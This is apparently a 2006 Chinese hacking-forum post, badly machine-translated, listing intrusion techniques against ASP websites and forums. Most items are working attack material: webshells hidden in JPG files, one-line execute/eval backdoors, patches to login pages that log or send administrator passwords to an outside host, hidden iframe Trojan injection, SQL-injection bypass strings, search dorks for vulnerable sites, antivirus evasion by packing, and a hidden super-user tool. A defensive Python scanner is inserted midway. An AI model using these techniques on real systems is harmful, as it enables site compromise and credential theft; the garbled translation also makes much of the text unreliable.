Let you become the ASP Trojan master-vulnerability warning-the black bar safety net

ID MYHACK58:62200613311
Type myhack58
Reporter Anonymous
Modified 2006-12-17T00:00:00


1. Name: how to make an ASP Trojan hidden in a picture still display as a picture. Build an asp file with the content <!--#include file="ating.jpg"-->. Find a normal picture, ating.jpg, and insert a one-line Trojan, such as Ice Fox, by editing the picture in hex with UltraEdit. For it to run successfully, also search for <% and %> and change them to 00 (don't replace those of your own asp), and then add <SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request. form(#)+) </SCRIPT> at the beginning of the jpg file.

2. Name: tricky cafe. First use the Elite cafe auxiliary tool to get a username and password, then connect to a machine with Computer Management, open telnet, connect, open sharing, copy a Trojan horse over, and finally run it.

3. Name: feel MD5 brute force charm rainbowcrack usage first with rtgen to generate library "rtgen md5 byte 1 7 5 2 4 0 0 4 0 0 0 0 all" 1 and 7 represents the password minimum and maximum length Al statin I then added a method: http://md5.rednoize.com/ online hack Or to http://www. md5lookup. com/? category=01-3&searck=on

4. A lot of the time when we make a Trojan evade antivirus ("free kill") we do not understand assembly; packing it with the Beidou packer is enough to escape detection. There are a lot of packers, and everyone packs their Trojans. It is best to choose several lesser-known packers.

5. Name: covert insertion type ASP Trojan (1)in our to tricks of the asp file added the following contents <%if request("action")="ok" then%> the shell code is inserted here, is best pony, but also to encrypt it <%end if%> Visit time on your hand leg of the asp files back plus? action=ok,you can (2)another method, in the our to tricks of the asp file added the following contents <% on error resume next strFileName = Request. QueryString("filer") set objStream = Server. createObject("ABODB. Stream") objStream. Type = 1 objStream. Open objStream. LoadFromFile strFileName objStream. SaveToFile Server. mappath("ating. asp"),2 %> Access the time in the tricks of the asp files back plus? filer=XXX XXX is your local upload of a path such as c:ating123.asp After uploading the tricks of the asp in the same folder with ating,asp (3)the premise to give the system permission, and Go to the website directory under a layer of mkdir s... copy ating. asp s.../ This antivirus software not found Visit http://website/s.../ating. asp can be

6. Tool: http://hack520.tengyi.cn/chaojiyonghu.rar This tool generates a super-user on the computer, user name: hack, password 110. The user you built can't be seen in DOS or in Computer Management, and is deleted.

7. Name: QQ group scripting attacks Open the qq dialogue, deceive, copy the message, and then The following content is saved as. vbs file, run it Set WshShell= WScript. createobject("WScript. Shell") WshShell. AppActivate "QQ information attack script" for i=1 to 2 0 WScript. Sleep 1 0 0 0 WshShell. SendKeys"^v" WshShell. SendKeys i WshShell. SendKeys "%s" Next

8. Search: program production: WAN Peng free application space to directly upload asp the horse can be

9. Name: thoroughly find the ASP Trojans on your site. (1) Use antivirus software. (2) In FTP client software, click "Tools" -> "Compare folders". (3) Upload asplist2.0.asp to the site space and review its listing; from the general features of each ASP file you can estimate which are ASP Trojans. (4) Use the tool Beyond Compare.
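
A triage scan a site owner can run over a copy of the web root to complement the methods in item 9. It is an added example, not code from the original post: the function names and the indicator patterns are assumptions, derived from the techniques this list describes (script in image files, one-line execute/eval of request input, ADODB.Stream file writes, images included as script, directory names ending in dots).

```python
import os
import re
import sys

# Triage heuristics derived from the techniques in this list (added example).
RUNAT_SERVER = re.compile(rb"runat\s*=\s*[\"']?server", re.I)
ONE_LINER = re.compile(rb"\b(execute|eval)\s*\(?\s*request\b", re.I)
STREAM_WRITE = re.compile(rb"adodb\.stream.*savetofile", re.I | re.S)
INCLUDE_IMAGE = re.compile(
    rb"#\s*include\s+(file|virtual)\s*=\s*[\"'][^\"']+\.(jpe?g|gif|png|bmp)[\"']", re.I)
IMAGE_EXT = {".jpg", ".jpeg", ".gif", ".png", ".bmp"}
SCRIPT_EXT = {".asp", ".asa", ".cer", ".cdx"}  # extensions IIS maps to ASP


def check_file(path):
    """Return the list of reasons a single file looks suspicious."""
    ext = os.path.splitext(path)[1].lower()
    if ext not in IMAGE_EXT | SCRIPT_EXT:
        return []
    with open(path, "rb") as fh:
        data = fh.read()
    reasons = []
    if ext in IMAGE_EXT and (RUNAT_SERVER.search(data) or ONE_LINER.search(data)):
        reasons.append("server-side script inside an image")
    if ext in SCRIPT_EXT:
        if ONE_LINER.search(data):
            reasons.append("request input passed to execute/eval")
        if STREAM_WRITE.search(data):
            reasons.append("ADODB.Stream writes a file (review)")
        if INCLUDE_IMAGE.search(data):
            reasons.append("includes an image file as script")
    return reasons


def scan_webroot(root):
    """Walk a web root and return sorted (relative_path, reason) findings."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for d in dirnames:
            if d.endswith("."):  # e.g. "s...", which many Windows tools mishandle
                rel = os.path.relpath(os.path.join(dirpath, d), root)
                findings.append((rel, "directory name ends with a dot"))
        for name in filenames:
            path = os.path.join(dirpath, name)
            for reason in check_file(path):
                findings.append((os.path.relpath(path, root), reason))
    return sorted(findings)


if __name__ == "__main__":
    for rel, reason in scan_webroot(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{rel}: {reason}")
```

The ADODB.Stream hit is only a prompt for review, since legitimate upload code uses the same object; comparing the web root against a known-good copy, as in (2) and (4), remains the stronger check.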

10. Name: expand ideas to get DVBBS account "one man's Bible"of animation (1)the previously obtained webshell want to enter DVBBS background,want the administrator password, it can be The old way: Modify admin_login. asp plaintext DVBBS backstage password In"username=trim(replace(request("username")this line behind Dim fsoObject Dim tsObject Set fsoObject = Server. createObject("Scripting. FileSystemObject") set tsObject = fsoObject. createTextFile(Server. MapPath("laner.txt")) tsObject. Write CStr(request("password")) Set fsoObject = Nothing Set tsObject = Nothing As long as the administrator logs in to the background, laner.txt is generated in the directory (2)login. asp in Case "login_chk"the following: on error resume next Dim rain set rain=server. createobject("adodb. stream") rain. Type=2 rain. CharSet="gb2312" rain. Position=rain. Size rain. Open rain. LoadFromFile server. MapPath("laner. asp") rain. writetext now&request("username")&"text:"&request("password")&chr(1 0) rain. SaveToFile server. MapPath("laner. asp"),2 rain. Close set rain=nothing Such a laner. asp will get all of the login person login time, user name and password (3)If you have your own website or another webshell(strongly recommended): You can create a directory laner,on the inside create an empty laner. asp and the following code in the rain. asp: <%if request("n")<>"" and request("p")<>"" then on error resume next Dim rain set rain=server. createobject("adodb. stream") rain. Type=2 rain. CharSet="gb2312" rain. Position=rain. Size rain. Open rain. LoadFromFile server. MapPath("laner. asp") rain. writetext now&"Name:"&request("n")&"Password:"&request("p")&chr(1 0) rain. SaveToFile server. MapPath("laner. asp"),2 rain. Close set rain=nothing end if%>

11. Name: the use of QQ online status of catch the pigeon broiler Generate a qq-line state, the inside address into the Trojan address, sent to the forum In the login. asp where to insert the sentence: response. write"<scriptsrc=http://www. ptlushi. com/laner/rain. asp? n="&request("username")

&""&"&p="&request("password")&"></script>" response. write"<iframesrc=http://yourwebsite/laner/rain. asp? n="&request("username")

&""&"&p="&request("password")&"></iframe>" The results of all of the landing people will obediently put the name and password sent to your laner. asp.

12. Animation name: the media in China the entire Station program exists multiple vulnerabilities Vulnerability program:media China the entire Station program(first edition) Official website:http://meiti. elgod. com/ Vulnerability: %5c(storm) upload injection Upload page:down1/upload. asp

13. Name: Free Phone + MSH command-line tool http://www.globe7.com/ Open the home page, click Free DownLoad in the lower-left corner, download it locally and install it. After running, it will prompt that it is looking for your area code. Because these are international calls, register for an account and you are sent 100 cents; domestic calls are charged at 0.01/min, so you have 100 minutes of free calls per account. Note that for a fixed telephone or PHS the format is 0086521123456; 521 was originally 0521, so omit the leading zero. Mobile phone numbers are the same.

14. Name: Bo-Blog a new vulnerability http://[site address]/index.php?job=../admin/ban Save out the <table> for the "prohibited search words" part, complete the address inside it, and insert the one-line Trojan

15. Name: hook soul's invasion of legend private server With Baidu search for legendary inurl:tuku Or legendary inurl:wplm.htm Or again the legendary inurl:coolsites. asp Links to insert the word Trojan can be

16. Program: hongda enterprise entire Station upload vulnerability Official home page:http://www. mu126. com/ Vulnerability page:/cx/upfile. asp (upload vulnerability)

17. No Pirates of the mailbox, modify the password, user name and password in the Add or=or

18. Name: bbsxp5.16 the background to get webshell bbsxp5.16 the filter of the asp,asp,cdx,cer,the extension of the file to upload is in the basic settings on the Add On the upload type also is not, and ban Check the modified data of the backup data names, we can put this web page saved locally, modified the source code uploaded.

19. Name: JHACKJ 2005 years latest classic tutorial Download look at it, good, each big website have

20. Name: effort the invasion of South Korea broiler In the? D of the scan of the injection point item, open this: http://www.google.co.kr/advanced_search?hl=zh-CN This is the Advanced Search Terms, Keywords, just write. Here I write asp? name= set to display per page 100. Language selection of Korean. Search, a lot of sa.

21. Name: any Internet cafe management system crack Selected smart ABC, then vv is input, the cursor backward two steps, press the delete key just enter the two vv delete Finally, press the Inter key

22. Name: crack the QQ space to insert a web page Trojan's code Now Tencent has been sealed a lot more QQ space code, just as before <iframe src="Trojan address" name="lcx" width="0"

height="0" frameborder="0"></iframe>insert pages the Trojan code also first to be terminated. Break disable method code is as follows: <div id=DI><img src="javascript :DI. innerHTML=\<iframe src=Trojan address width=1 9 0 height=1 9 0

marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no></iframe>\"


Finally, attached is the summary by "Kara is ok":

1. Upload vulnerability [not covered] PS: if you see "Choose your file to upload", [re-upload] or "please login", 80% of the time there is a loophole! Sometimes the upload will not succeed; that is because the Cookies are not the same. We use WSockExpert to capture the Cookies, then upload with DOMAIN.

2. Injection vulnerability [not covered] PS: the MD5 password. Sometimes it is not easy for us to crack it. If it is a [SQL database], then we can use the following command: http://[injection URL];update admin set password=\new MD5 password\ where password=\old MD5 password\-- [admin is the table name.]

3. Side note, that is, going across sites. The site we want to invade may be sturdy and invulnerable; we can find another site on the same server as this site, and then use that site, with privilege escalation, sniffing and other methods, to invade the site we want to invade. There is a difficulty here: on some servers the absolute path is Through encryption, it will see we've got a

4. Storm library: replace the / between two directories with %5c. EY:http://www. ahttc. edu. cn/otherweb/dz/bgs/BigClass. asp? BigClassName=mandate&BigClassType=1 If you can see:\E:ahttc040901otherwebdzdatabaseiXuEr_Studio.asa\不是一个有效的路径 the. To determine the path The path name is spelled correctly, and whether the connection to the File Storage Server. This is the database. Download it with FLASHGET and change it into .MDB format.

5.\ or\=\or\this is a can connect to the SQL language phrase. You can go directly to the background. I collect a bit. Similar: \or\\=\ " or "a"="a \) or (\a\=\a ") or ("a"="a or 1=1-- \ or \a\=\a

6. Social engineering. This we all know. Just guess the solution. EY: the http://www.neu.edu.cn/waishi/admin admin waishi

7. Writing into an ASP-format database. This is the one-line Trojan [<%execute request("value")%>], commonly used in the guestbook. EY: the http://www.ahsdxy.ah.edu.cn/ebook/db/ebook.asp [this is an ASP-format database], and then write the word


8. Source code: some web sites use source code downloaded online. Some webmasters are very inexperienced and change nothing. EY:http://www. ahsdxy. ah. edu. cn/xiaoyoulu/index. asp This station uses: outstanding alumni, the source I have, Default database/webshell path: databaseliangu_data. the mdb backend management: adm_login. asp password and user name are


9. Default database/webshell path use:such a lot of sites/people to others of the WEBSHELL. /Databackup/dvbbs7. MDB /bbs/Databackup/dvbbs7. MDB /bbs/Data/dvbbs7. MDB /data/dvbbs7. mdb /bbs/diy. asp /diy. asp /bbs/cmd. asp /bbs/cmd.exe /bbs/s-u.exe /bbs/servu.exe Tools: website, Hunter mining chicken EY: the http://www.cl1999.com/bbs/Databackup/dvbbs7.MDB

10. View a directory of law:the people some of the site can disconnect a directory, you can asked party directory. EY: the http://www.ujs168.com/shop/admin/ http://escolourfvl.com/babyfox/admin/%23bb%23dedsed2s/ So we can find database, download I don't need to teach.

11. Tool the overflow:. asp? NewsID= a /2j. asp? id=18 . asp? id=[this method can get a lot of WEBSHELL]

12. Search engines use:

(1). inurl:flasher_list. asp default database:database/the flash. the mdb backend/manager/ (2). Looking for website management background address: site:xxxx. comintext:management site:xxxx. comintitle:management <keyword many, since have been looking for> site:xxxx. cominurl:login (3). Find access database,mssql, mysql connection files allinurl:bbsdata filetype:mdbinurl:database filetype:incconn inurl:datafiletype:mdb My master does not do. Self do do.

13. The COOKIE trick: change your own ID to the Administrator's, and the MD5 password to his as well; with Guilin veterans' tools you can modify COOKIES. I will not say more about this.

14. The use of a Common Vulnerability: such as dynamic network BBS EY: the http://js1011.com/bbs/index.asp You can start with:dvbbs privilege elevation tool, so that the self has become the front Desk administrator. THEN, the use of:dynamic network solid top patch tool, find a solid-top patch, and then made COOKIES, this to your self do. We can use WSockExpert Made Cookies/the NC package This I will not do, online tutorials, self-have a look. Tools: dvbbs privilege elevation tool to automatically mesh the solid top of the patch tool

15. There are some old vulnerabilities, such as IIS3, 4 view the source code, to 5 delete CGI, PHP some of the old hole; I will not go into them. Too old. They are not of much use.